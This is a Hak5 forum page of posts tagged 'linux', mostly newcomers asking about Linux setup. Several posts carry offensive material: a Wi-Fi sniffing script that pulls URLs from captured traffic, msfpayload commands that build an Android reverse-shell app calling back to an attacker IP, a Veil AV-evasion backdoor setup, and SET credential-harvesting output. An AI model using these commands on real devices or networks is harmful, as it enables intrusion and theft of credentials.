Jump to content

Search the Community

Showing results for tags 'linux'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Hello, I want to use subterfuge but I am getting an error , please help me: Traceback (most recent call last): File "/bin/subterfuge", line 7, in <module> from update import updatecheck File "/usr/share/subterfuge/update.py", line 24, in <module> for settings in setup.objects.all(): File "/usr/lib/python2.7/dist-packages/django/db/models/query.py", line 141, in __iter__ self._fetch_all() File "/usr/lib/python2.7/dist-packages/django/db/models/query.py", line 966, in _fetch_all self._result_cache = list(self.iterator()) File "/usr/lib/python2.7/dist-packages/django/db/models/query.py", line 265, in iterator for row in compiler.results_iter(): File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 700, in results_iter for rows in self.execute_sql(MULTI): File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 775, in execute_sql sql, params = self.as_sql() File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 100, in as_sql out_cols, s_params = self.get_columns(with_col_aliases) File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 246, in get_columns col_aliases) File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 328, in get_default_columns r = '%s.%s' % (qn(alias), qn2(column)) File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 62, in __call__ r = self.connection.ops.quote_name(name) File "/usr/lib/python2.7/dist-packages/django/db/backends/dummy/base.py", line 18, in complain raise ImproperlyConfigured("settings.DATABASES is improperly configured. " django.core.exceptions.ImproperlyConfigured: settings.DATABASES is improperly configured. Please supply the ENGINE value. Check settings documentation for more details. I followd the instructions on the git site : https://github.com/Subterfuge-Framework/Subterfuge Please send help , Caps....
  2. Hi Guys, I had this crazy question always stuck inside of my head... Yet I was too embarresed to ask before. Question is this, I have a high end pc i get amazing performance with Windows 8.1 but it gets laggy and unstable in Kali Linux what could be the problem ? I am writing this from my Kali Linux clean installed system. One and only OS installed yes its capable of doing all these but even after installing Graphic cards drivers, youtube gives me laggy videos. I was wondering if there is something missing, is there something that everyone knows that i dont about how to tweak my system for Kali. Extra Question : Why there are no Chipset drivers or Storage Accelerators etc in Linux distros like we do it in Windows ? Thanks In Advance. Sincerely,
  3. Linux is by far my favorite operating system, the more I use it the more I dislike windows. I want to switch all my computers over to Linux, but I am also a PC gamer. I could dual boot but restarting just to play a game is a hassle. I've heard about some virtualization tech that allows for hardware pass through. However every article I've read requires more than one monitor, which is fine for my desktop, but I want to do it on my laptop as well. My question is this, is it possible to run a virtual guest that can use my nvidia graphics card, but doesn't require separate monitors for guest and host?
  4. Hi ! I wrote this script to sniff on OPN 802.11 networks and extract URLs but it seems that the last part with Urlsnarf doesn't work ! Can you please help me to correct it? #!/bin/bash # My first script #enter functions press_enterandstop() { echo -en "\nPress Enter to continue" read #airmon-ng stop mon0 } press_enternoclear() { echo -en "\nPress Enter to continue" read } press_enter() { echo -en "\nPress Enter to continue" read clear } #kill NeworkManager selection= until [ "$selection" = "1" ]; do echo " NeworkManager 1 - Stop NetworkManager 2 - Restart NetworkManager 0 - exit program" echo -n "Enter selection: " read selection echo "" case $selection in 1 ) service NetworkManager stop ; press_enter ;; 2 ) service NetworkManager restart ; press_enter ;; 0 ) exit ;; * ) echo "Please enter 1, 2, or 0"; press_enter esac done echo "Seting monitor mode" iwconfig press_enternoclear; function monitormode(){ echo -n "Type the network interface " read wlan airmon-ng start $wlan } monitormode; #Checking the mon interface #Checking monitor mode function mon(){ ifconfig -s -a | grep -i "mon"> moninterface.txt mon=`head -n 1 moninterface.txt | cut -c -4` echo $mon press_enternoclear; echo "Checking injection capabilities" aireplay-ng -9 $mon #press_enternoclear; #Capturing export CAPT_DIR=/home/leila/bin/captures export CAPT_DEST=$CAPT_DIR/capture mkdir -p $CAPT_DIR airodump-ng -w $CAPT_DEST $mon press_enternoclear; } mon; #Decrypting the files function decryptap(){ f=`ls -w 1 $CAPT_DIR/capture-??.cap | tail -n 1` echo -n "Type the AP " read ap airdecap-ng -e "$ap" $f g=`ls -w 1 $CAPT_DIR/capture-??-dec.cap | tail -n 1` tcpdump -r $g -vvv > suctest.txt dsniff -i lo > sniff.txt & urlsnarf -i lo > url.txt & tcpreplay -i lo -t $g echo "finish" } decryptap; airmon-ng stop $mon
  5. Hi all, I'm running the following script in NMAP... nmap -sS -T2 -P0 -V [IP Address] -D [Decoy IPs, separated by commas] ... and I get the following output... Nmap version 6.49BETA5 ( https:\\nmap.org ) Platform: arm-unknown-linux-gnueabihf Compiled with: liblua-5.2.3 openssl-1.0.1k libpcre-8.35 nmap-libpcap-1.7.3 nmap-libdnet-1.12 ipv6 Compiled without: Available nsock engines: epoll poll select (sana)USERNAME@localhost:~$ ...and that's it. No actually output from nmap is given. Why is this not giving me anything? What have I done incorrectly? Thank you.
  6. Gr33tingz 3@rthl!ngz ! So, I got a hamidown laptop, nothing special... but I wanted to have a multiboot system. I was going down the list of what I want to start with and fair warning, sadly (Or noobishly?) I been a windows user like.... well until six monts ago, Though in a very nerd like fashion, computers being my life, I have digged in and learned my way around a terminal like a champ but I have a way to got ... SO! This PC has.... sigh... 2gbs of ram (will have for in three day... still pretty emberassing lol). 250GB og memory. Im here to ask all you technolist... lust? If I where to Start a bootable repetuar on this heap of.. Windows 7 (Or 8, but seems more stable for the wares im pushing) Ubuntu Kali CAN SOME ONE PLEASE! Propose some partitioning Schemes. NO, I dont do REALLy havy dude like Video editing, and lets be serious, couldnt even If I wanted to lol. Id use this more as a swiss armyknife for Web Dev Work (not using TOO fancy local dev progz (I LOVE ATOM!!.. adobe can suk it)). Day to day business use and my sharpest knif... Pen Testing . There you have it... PC SPECS, desired OSs' and my purpose for this SSH-INE!!!!!! Appreciarte any suggestions, -ScriptSo
  7. Hello , I cant make a backdoor that works with a dns , I want to use Veil to bypass the AV but it does not work . What I use in Veil : - I use python/shellcode_inject/base64_substitution - For payload windows/meterpreter/reverse_tcp_dns Veil asks me 2 times for a lhost . What I use in Metasploit : - multi/handler - payload is windows/meterpreter/reverse_tcp_dns - lhost is my local ip - lport is my port It works witout a dns. Please help .
  8. I recently made the switch from windows to full time linux. Everything is going well except when i want to use my webcam for recording a video. I have used serveral including cheese which crashes when i hit the record button and guvcview which shows a black screen. Any other options that might help?
  9. Sometimes you come across a generic USB drive and the drive doesn't have a unique serial number in the firmware. I know that if one of these devices is plugged in to a Windows machine that it will generate a serial number for the USB drive and it will be identifiable as a generated serial number because it will contain a "&" in the second position of the serial number. I also know that different route hosts on the same machine will generate a different serial number for the same USB drive on the same Windows machine. I also know that Ubuntu will store USB device information in the var/log/syslog file. My question is if a generic USB device is plugged into linux, will it generate a serial number for the device in the same way that windows does? Will it also generate a different serial for the same USB drive through different USB ports? I'd try this myself to get the answer but out of all of the USB drives I have all of them have actual serial numbers. -.- Thanks for your time!
  10. I want to just dump my memory to a file. There are a lot of references to /dev/mem and /dev/crash but when I try to use those file locations I get file or directory not found. How do I go about this?
  11. Software: git clone https://github.com/antirez/dump1090.git Compile: cd dump1090;make;make install Simple execution/dump : dump1090 Live feed: ./dump1090 --interactive Unlike the Windows software, it can plot planes on a builtin http interface using Google Maps ./dump1090 --enable-agc --aggressive --net --net-http-port 8080 Then open your browser and go to to watch planes fly above you.
  12. I got a smoking deal on this LG VK700 Tablet. I'm pretty happy with the device but I'd like to have a root terminal. It's a Linux device and Linux without root feels kinda wierd. Any of you guys rooted one of these things? The carrier is Verizon if that makes a difference. I've looked up instructions on rooting an Android device. But there are a lot of warnings about bricking the device. I'm not totally sure how the whole thing works. I have a micro SD and SD reader along with a Linux machine with MTP installed. Is this going to work or do I need additional hardware?
  13. I need a Linux that will do one thing and one thing only. Surf the internet. What is a good minimal LInux?
  14. Just curious I broke into kali alittle bit(2.0), I love the new kali suit even know i'm still using windows 7 : I have not messed around much with unix - however I found debian a sweet suite in whole.... quick and effeciant ... I was taking a gander over freeBsd it looked like the next best thing - running a IBM unix suite *which offcourse is not avaible to general public* from my understanding. Generally I was alittle overbeared with the major disclaimer from at&t.... before homepage that's ok though. I've read up on kali it has a good rep yet not really by the general unix/linux populace why I have no clue* I guess cause it's scary*... even windows runs threw a net frame work and unix... Kindof a silly sort ..... What's you're opinion on which one to use : I know kali run's debian ....... FreeBsd Runs Unix There both new with a grub thats not really the big deal ....... My questions are... *noob friendly please* I know as in the job market im looking forward to taking classe's .... software development c / c++ ...... but from the looks of it, UNIX is a must... Not the funnest question, but to kiss ass alittle I love hack5 I hope to be doing buisness in the near future ..... great educational videos..... keep it going it's hard to find a more alternative education these days. Sincerly, You'rs truly.. Ps. We all google however i'm a lazy bastard. Looking for good advice.
  15. Hi, just installed the new Kali Linux, and was just wondering if anyone could tell me, how i add icons to the side dock that ive installed. i can see you right click on the application to add one of the preinstalled pplications, but i wanted to know how to add firefox which ive downloaded to that sidebar. Thanks
  16. Hello, I am new to this hacking stuff. I'm curious so I'm trying out new things. One thing I came across is SSLstrip...I read about it and its use so I wanted to try it on a system. But after doing the steps as given in the video How To: Use SSLstrip On Kali Linux by Chris Haralson on YouTube, the victim system is still opening HTTPS. I tried using SSLstrip from BackTrack 5 r3 also...but I wasn't successful. I know I'm missing something..Please help me.
  17. What benefits would I see if I upgraded my server hardware? I took an old windows pc out of the office's recycle bin. The hardware was OLD! Dell Optix GX 260 Intel® Pentium® 4 Level 1 (L1) cache 8 KB 512 MB RAM ~100 GB PSATA HDD I installed Ubuntu Server 12.x (32bit) It's been workin great for 1 year+ I host a corporate wiki on it, a CRM software. I am adding a ticketing program. It runs so great, I don't mess with it too much. Does this old hardware that idles mostly 24/7 consume lots of power? Would switching to 64-bit hardware make more software available? The $600 server is a nice price. But I could spend that on desktop hardware upgrades. New SSD. Videocard. etc. Hak5 keep inspiring. The linux server build was one the biggest eye-openers I've ever had. The possibilities are endless.
  18. Hey everyone, long time listener here, finally made an account to promote a new product from our start-up. (I hope thats okay) If this should be moved please let me know a better place to put it. Anyways, Skyworks Aerial Systems is proud to announce a new product and we would love your feedback. You can check out the kickstarter here: https://www.kickstarter.com/projects/dronesmith/eedutm-an-easy-educational-drone-kit-for-learning?ref=nav_search But the main idea is that it is an easy to build quadcopter that has a Intel Edison onboard with connections for an Arduino shield. We are very excited to see what hackers/makers like yourselves will do with with the platform and are eager to hear your thoughts and ideas.
  19. Howdy Hak5 folks.. Well, I'm expected some "try harders" and other such encouragement :)..I'm at the very tail end of the CPT exam. If anyone is unsure of it, first part is multi-choice (aced it!) ..second is compromising two VM's..got first in minutes happy to say..the second one......here is where I'm losing my hair very quickly. The objective is root password on both vm;s...this second one is where I seem to be hitting a dead end, and this is the first reaching out for help attempt. Basically, from what I can gather, this particular vm needs to be compromised via a local exploit be it privy escalation, shellcode yadda yadda..I have tried (I think) most methods that I can figure out (at my level at least) and just getting killed with each attempt. Not looking for someone to spell it out for me, after all I've been at this VM for 2 weeks now before asking for some guidance. So I'm happy to start a dialogue with anyone interested to help. I'll spill some of the VM details here and if someone is kind enough to brainstorm with me, it would be much appreciated. Cheers VM Info: Red Hat Linux 9 (Shrike) Kernel 2.4.20-8 i686 athlon i386 (bear in mind this is on a VMWare Workstation, host is AMD chip fyi) gcc 3.2.2 2 non-root accounts have been acquired, no sudo privileges, long story short, these accounts can't do squat The accounts allow direct (local) access on the vm, or via ssh etc. from attack VM Tried out about 12 known exploits (mainly exploit-db et.al) for OS version and kernel The discovered services have some minor-medium level vulnerabilities, but none from what I can tell help to getting to root/shadow file. FYI, for the exploits tried, (I'm a sooper noob with shellcode, but learning fast and taking ANOTHER course fml) some backfired entirely, some compiled but failed to run, some compiled ran but seg-faulted etc etc, so they may work and I'm just inexperienced at compiling or altering them appropriately I've done some local enumeration of possible config, suid etc etc flaws but cant really determine an approach Think that about does it for a 'where I'm at'...like I said, I actually dont really want the "Here's how.." but some discussion or tips would really be appreciated. Just kinda fried and probably overthinking but having trouble getting focused and feel kinda burnt as far as ideas go.
  20. Is there a way in Linux to search for all files that are set to execute as root? If so, what would be the command? Thanks
  21. So recently i disabled apache and start using python def server.So i normally use Social Engineering Toolkit for credential harvesting and instead i got normal output with username and password i got this: - - [22/May/2015 02:57:14] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: __a=1 PARAM: __dyn=7w86i3S2e4oK4osXWU5O12wAxu3mdwqovzEkxu PARAM: __req=1 PARAM: __rev=1749615 POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: lsd=AVqNsoTe PARAM: miny_encode_ms=13 PARAM: ph=V3 POSSIBLE USERNAME FIELD FOUND: q=Miny1~191~,~,"~","~":~":"~.~0~],["~",{"~login~null~php~",~click~":{"~1~":[~time_spent~script_path_change~source_path~source_token~dest_path~":"/~dest_token~ad976420~cause~normal~click_ref_logger~",["~act~","-","~r~","/",{"~ft~":{},"~gt~":{}},~981~","/~"],~3~5~0DYF~time_spent_bit_array~tos_id~start_time~tos_array~],"~tos_len~tos_seq~tos_cum~},~12~8~user~page_id~posts~":[["~ods~:~ms~qa~www~impression_id~load~referrer~":""},~scuba_sample~int~clientWidth~1081~clientHeight~576~},"~view~"},"~_ds~www_tinyview_port~_options~addBrowserFields~true~}},~bits~js_initialized~]},~unload~"},~tsfc8e~12t611~9u6da4~2~]]},{"~9~pmuvwi~oz386j~email~0a3dca32~4~7~8vp9er~1432277838310~1432275335811~1432276735509~244~10~1432276742727~1432276807627~1432276808358~pass~1432276809257~15~31~1432277018629~1432277020860~1432277021972~1432277023222~6~[{"~0368b056~1432277835317~1432277835409~1432277838303~476~353~1432277838343~]],"~trigger~"},{"~0RDN~1432275335806~1432275333~1432275335949~1432275335948~1432276667~1432276675367~1432276735502~541~1432276742721~482~354~1432276734~475~1432276742997~1432276667294~1432276667391~1432276675375~1432276742996~1432276807623~571~242~1432276808357~540~284~1432276809251~502~352~1432276805~1432276809341~1432276805393~1432276805462~1432276807642~1432276809340~1432276904~225~1432276912342~1432276912~391~32~64~1432276976920~1432276988~1409286147~1432276904290~1432276904375~1432276912349~1432277020854~557~1432277021970~530~298~1432277023217~488~360~73f928f6~1432277019143~1432277019214~1432277020869~1432277023303~1432277019~1432277023304~]]}]~3R1SACy1TA3zy1U1VOEPzGxQzGxRSFBHyTAUy1_A3SyVA2wy2x2y3TwCD2zE2AK2Bz2Cx2Dz2E2FWK2GAW2H2IA2Jy2KK2Lz2M2N3UwCDXY1GI3AxZI3VwCxFyJyJ-_1w1x1y1z1A3Ww3XwCw1Bx3z1CFBH1D3AwCD1W1X1YBNB1ZB1-ENB2OB2PML2Q3YwC3Z3-A1W1X1YBNB1ZB1-3_1SACy1TA2-y1U1VXY4wI3BxZI4xwLxFyJyJ-_1w1x1y1z1ACwCwCw1Bx2-1CFBH1D3Bw1QD1HE1IA2-y1Jz4yx1KM3ywC1L1Mz1Ex1NzCx1Oz1E1P4zw1QDOEPSFBHyQAUyRzGxTzGxVA2R2S4Aw1Q2X1SACy1TA2Ty1U1V1HE1IA2Ty1Jz4Bx1KMLwC1L1Mz2Yx1NzCx1OzL1P4Cw1QDXY1GI3CxZI4DwCx2_yJyJ-_1w1x1y1z1A4Ew3DwCw1Bx2T1CFBH1D3Cw3EDXY1GI3FxZI4FwLxFyJyJ-_1w1x1y1z1A4Gw4HwCw1Bx2T1CFBH1D3Fw2YD1HE1IA2Ty1Jz4Ix1KM4JwC1L1Mz2Yx1NzLx1Oz1R1P4Kw1RDOEPzGxQzGxRSFBHyTAUy1_A3wyVA2wy2x2y4Lw1QD2zE2AK2Bz2Cx2Dz2E2FWK2GAW2H2IA2Jy2KK2Lz2M2N4Mw1QD1W1X1YBNB1ZB1-ENB2OB2PML2Q4Nw1QDOEPSFBHyQAUyRzGxTzGxVA2R2S4Ow1R2X1SACy1TA2Uy1U1VXY1GI3GxZI4PwCx2_yJyJ-_1w1x1y1z1A4Qw4RwCw1Bx2U1CFBH1D3Gw1RDXY1GI3HxZI4SwLx3IyJyJ-_1w1x1y1z1A4Tw4UwCw1Bx2U1CFBH1D3Hw3yDXY1GI3JxZI4Vw2WxFyJyJ-_1w1x1y1z1A4Ww4XwCw1Bx2U1CFBH1D3Jw3QD1HE1IA2Uy1Jz4Yx1KM3KwC1L1Mz1Fx1NzCx1Oz3x1P4Zw1FDOEPzGxQzGxRSFBHyTAUy1_A3wyVA2wy2x2y4-w1RD2zE2AK2Bz2Cx2Dz2E2FWK2GAW2H2IA2Jy2KK2Lz2M2N4_w1RD1W1X1YBNB1ZB1-ENB2OB2PML2Q5ww1RDOEPSFBHyQAUyRzGxTzGxVA2R2S5xw1F2X1SACy1TA2Zy1U1V1HE1IA2Zy1Jz5yx1KM5zwC1L1Mz2Yx1NzCx1Oz3x1P5Aw1FD1HE1IA2Zy1Jz5Bx1KM5Cw5D1L1Mz5Ex1NzLx1Oz3E1P5Fw1ED1HE1IA2Zy1Jz5Gx1KM5HwC1L1Mz3Lx1Nz2Wx1Oz3K1P3Mw1EDOEPzGxQzGxRSFBHyTAUy1_A3wyVA2wy2x2y5Iw1FD2zE2AK2Bz2Cx2Dz2E2FWK2GAW2H2IA2Jy2KK2Lz2M2N5Jw1FD1W1X1YBNB1ZB1-ENB2OB2PML2Q5Kw1FDOEPSFBHyQAUyRzGxTzGxVA2R2S3Mw1E2X1SACy1TA2Vy1U1VXY1GI3NxZI5LwCx2_yJyJ-_1w1x1y1z1A5Mw3DwCw1Bx2V1CFBH1D3Nw1EDXY1GI3OxZI5NwLx3IyJyJ-_1w1x1y1z1A5Ow5PwCw1Bx2V1CFBH1D3Ow2WDXY1GI3PxZI5Qw2WxFyJyJ-_1w1x1y1z1A5Rw5SwCw1Bx2V1CFBH1D3PwLDOEPzGxQzGxRSFBHyTAUy1_A5TyVA2wy2x2y5Uw1ED2zE2AK2Bz2Cx2Dz2E2FWK2GAW2H2IA2Jy2KK2Lz2M2N5Vw1ED1W1X1YBNB1ZB1-ENB2OB2PML2Q5Ww1EDOEPSFBHyQAUyRzGxTzGxVA2R2S5XwCD1HE1IA2Vy1Jz5Yx1KM3LwC1L1Mz1Fx1NzCx1Oz1F1P5ZwC5- POSSIBLE PASSWORD FIELD FOUND: q=Miny1~191~,~,"~","~":~":"~.~0~],["~",{"~login~null~php~",~click~":{"~1~":[~time_spent~script_path_change~source_path~source_token~dest_path~":"/~dest_token~ad976420~cause~normal~click_ref_logger~",["~act~","-","~r~","/",{"~ft~":{},"~gt~":{}},~981~","/~"],~3~5~0DYF~time_spent_bit_array~tos_id~start_time~tos_array~],"~tos_len~tos_seq~tos_cum~},~12~8~user~page_id~posts~":[["~ods~:~ms~qa~www~impression_id~load~referrer~":""},~scuba_sample~int~clientWidth~1081~clientHeight~576~},"~view~"},"~_ds~www_tinyview_port~_options~addBrowserFields~true~}},~bits~js_initialized~]},~unload~"},~tsfc8e~12t611~9u6da4~2~]]},{"~9~pmuvwi~oz386j~email~0a3dca32~4~7~8vp9er~1432277838310~1432275335811~1432276735509~244~10~1432276742727~1432276807627~1432276808358~pass~1432276809257~15~31~1432277018629~1432277020860~1432277021972~1432277023222~6~[{"~0368b056~1432277835317~1432277835409~1432277838303~476~353~1432277838343~]],"~trigger~"},{"~0RDN~1432275335806~1432275333~1432275335949~1432275335948~1432276667~1432276675367~1432276735502~541~1432276742721~482~354~1432276734~475~1432276742997~1432276667294~1432276667391~1432276675375~1432276742996~1432276807623~571~242~1432276808357~540~284~1432276809251~502~352~1432276805~1432276809341~1432276805393~1432276805462~1432276807642~1432276809340~1432276904~225~1432276912342~1432276912~391~32~64~1432276976920~1432276988~1409286147~1432276904290~1432276904375~1432276912349~1432277020854~557~1432277021970~530~298~1432277023217~488~360~73f928f6~1432277019143~1432277019214~1432277020869~1432277023303~1432277019~1432277023304~]]}]~3R1SACy1TA3zy1U1VOEPzGxQzGxRSFBHyTAUy1_A3SyVA2wy2x2y3TwCD2zE2AK2Bz2Cx2Dz2E2FWK2GAW2H2IA2Jy2KK2Lz2M2N3UwCDXY1GI3AxZI3VwCxFyJyJ-_1w1x1y1z1A3Ww3XwCw1Bx3z1CFBH1D3AwCD1W1X1YBNB1ZB1-ENB2OB2PML2Q3YwC3Z3-A1W1X1YBNB1ZB1-3_1SACy1TA2-y1U1VXY4wI3BxZI4xwLxFyJyJ-_1w1x1y1z1ACwCwCw1Bx2-1CFBH1D3Bw1QD1HE1IA2-y1Jz4yx1KM3ywC1L1Mz1Ex1NzCx1Oz1E1P4zw1QDOEPSFBHyQAUyRzGxTzGxVA2R2S4Aw1Q2X1SACy1TA2Ty1U1V1HE1IA2Ty1Jz4Bx1KMLwC1L1Mz2Yx1NzCx1OzL1P4Cw1QDXY1GI3CxZI4DwCx2_yJyJ-_1w1x1y1z1A4Ew3DwCw1Bx2T1CFBH1D3Cw3EDXY1GI3FxZI4FwLxFyJyJ-_1w1x1y1z1A4Gw4HwCw1Bx2T1CFBH1D3Fw2YD1HE1IA2Ty1Jz4Ix1KM4JwC1L1Mz2Yx1NzLx1Oz1R1P4Kw1RDOEPzGxQzGxRSFBHyTAUy1_A3wyVA2wy2x2y4Lw1QD2zE2AK2Bz2Cx2Dz2E2FWK2GAW2H2IA2Jy2KK2Lz2M2N4Mw1QD1W1X1YBNB1ZB1-ENB2OB2PML2Q4Nw1QDOEPSFBHyQAUyRzGxTzGxVA2R2S4Ow1R2X1SACy1TA2Uy1U1VXY1GI3GxZI4PwCx2_yJyJ-_1w1x1y1z1A4Qw4RwCw1Bx2U1CFBH1D3Gw1RDXY1GI3HxZI4SwLx3IyJyJ-_1w1x1y1z1A4Tw4UwCw1Bx2U1CFBH1D3Hw3yDXY1GI3JxZI4Vw2WxFyJyJ-_1w1x1y1z1A4Ww4XwCw1Bx2U1CFBH1D3Jw3QD1HE1IA2Uy1Jz4Yx1KM3KwC1L1Mz1Fx1NzCx1Oz3x1P4Zw1FDOEPzGxQzGxRSFBHyTAUy1_A3wyVA2wy2x2y4-w1RD2zE2AK2Bz2Cx2Dz2E2FWK2GAW2H2IA2Jy2KK2Lz2M2N4_w1RD1W1X1YBNB1ZB1-ENB2OB2PML2Q5ww1RDOEPSFBHyQAUyRzGxTzGxVA2R2S5xw1F2X1SACy1TA2Zy1U1V1HE1IA2Zy1Jz5yx1KM5zwC1L1Mz2Yx1NzCx1Oz3x1P5Aw1FD1HE1IA2Zy1Jz5Bx1KM5Cw5D1L1Mz5Ex1NzLx1Oz3E1P5Fw1ED1HE1IA2Zy1Jz5Gx1KM5HwC1L1Mz3Lx1Nz2Wx1Oz3K1P3Mw1EDOEPzGxQzGxRSFBHyTAUy1_A3wyVA2wy2x2y5Iw1FD2zE2AK2Bz2Cx2Dz2E2FWK2GAW2H2IA2Jy2KK2Lz2M2N5Jw1FD1W1X1YBNB1ZB1-ENB2OB2PML2Q5Kw1FDOEPSFBHyQAUyRzGxTzGxVA2R2S3Mw1E2X1SACy1TA2Vy1U1VXY1GI3NxZI5LwCx2_yJyJ-_1w1x1y1z1A5Mw3DwCw1Bx2V1CFBH1D3Nw1EDXY1GI3OxZI5NwLx3IyJyJ-_1w1x1y1z1A5Ow5PwCw1Bx2V1CFBH1D3Ow2WDXY1GI3PxZI5Qw2WxFyJyJ-_1w1x1y1z1A5Rw5SwCw1Bx2V1CFBH1D3PwLDOEPzGxQzGxRSFBHyTAUy1_A5TyVA2wy2x2y5Uw1ED2zE2AK2Bz2Cx2Dz2E2FWK2GAW2H2IA2Jy2KK2Lz2M2N5Vw1ED1W1X1YBNB1ZB1-ENB2OB2PML2Q5Ww1EDOEPSFBHyQAUyRzGxTzGxVA2R2S5XwCD1HE1IA2Vy1Jz5Yx1KM3LwC1L1Mz1Fx1NzCx1Oz1F1P5ZwC5- PARAM: ts=1432277838348 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. HELP!
  22. I guess you could say that I'm a tech enthusiast, but admittedly a lazy programmer/coder. If I wanted to buckle down and learn linux, networking, and even other coding languages; where would I go? I want to be a skilled user and play with all the great toys out there (rubber ducky, pineapple, etc.). I know there is a 'google machine,' and I've looked at a lot of sites, but I would like some [pro] advice on which is the best. I'd even be willing to pay for it if I knew I was getting 'quality instruction.' For example, you can see a bunch of courses available at: http://itpro.tv/course-library/#/ But, before I pay out monthly $$$, and it is pricey, I wanna be sure I'm going the right direction. I want to do this right. Where can I go to learn from scratch and go all the way to intermediate to skilled knowledge? I am sincere in this venture. -Krum NSS30 NSS30
  23. Hello, First off I would like to say hi hak5 forums, love the show and couldnt register with kali's forum so i came here because I would like to educate myself, or be educated by others on some aspects of metasploit/kali To put it in the simplest terms, I was creating a payload for android, and I was wondering, how do i know what LPORT to use. for my first try i tried 446 with the following command : msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=446 R > hack.apk and it returned an error that i cant specify exactly(because i dont remember) but to paraphrase it was something along the lines of : invalid LPORT option than i switched it too msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=443 R > hack.apk and for some reason that i cant understand port 443 worked. so back to my question.... How do i know what LPORT to use when creating a payload? msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf
  24. Ive been looking for a nice, simple laptop for a mini kali box. Preferably a smallish screen size for portability and compatible NIC (obviously) and non-touchscreen for a lighter laptop, and also it would be useless for me. SSD doesn't matter, i can just add one... I didn't know where else to turn but some Hak5 fans; just some models or even links to the laptops would be beautiful. Preferably ones you guys use already for pentesting and if its a new model, even better! Thanks in advance! glow
  25. Hey! I am running kali linux the latest build. I am running it from a USB drive in persistence mode. I have a macbook pro and it won't boot from the USB so I have to boot from the live CD till the GRUB and then choose live usb persistence to login to the system. I wanted to change my root passwd so while I was logged into my root account, I issued the command passwd root That asked me for a new passwd twice and I entered it both the times correctly. Later when I rebooted the system, it wont accept the new passwd (not the old one also) and wont let me login saying authentication failure. I have a second account on the box called "phantom" which does not have sudo privileges and both sudo passwd root sudo adduser phantom sudo does not work! Directly trying to edit the sudoers file from this second account does not let me do so cause I dont have sudo rights. Pressing 'e' in GRUB when I select the USB option does not work. What is the way around this? I can't afford to reinstall and lose the system. Any help is appreciated...
  • Create New...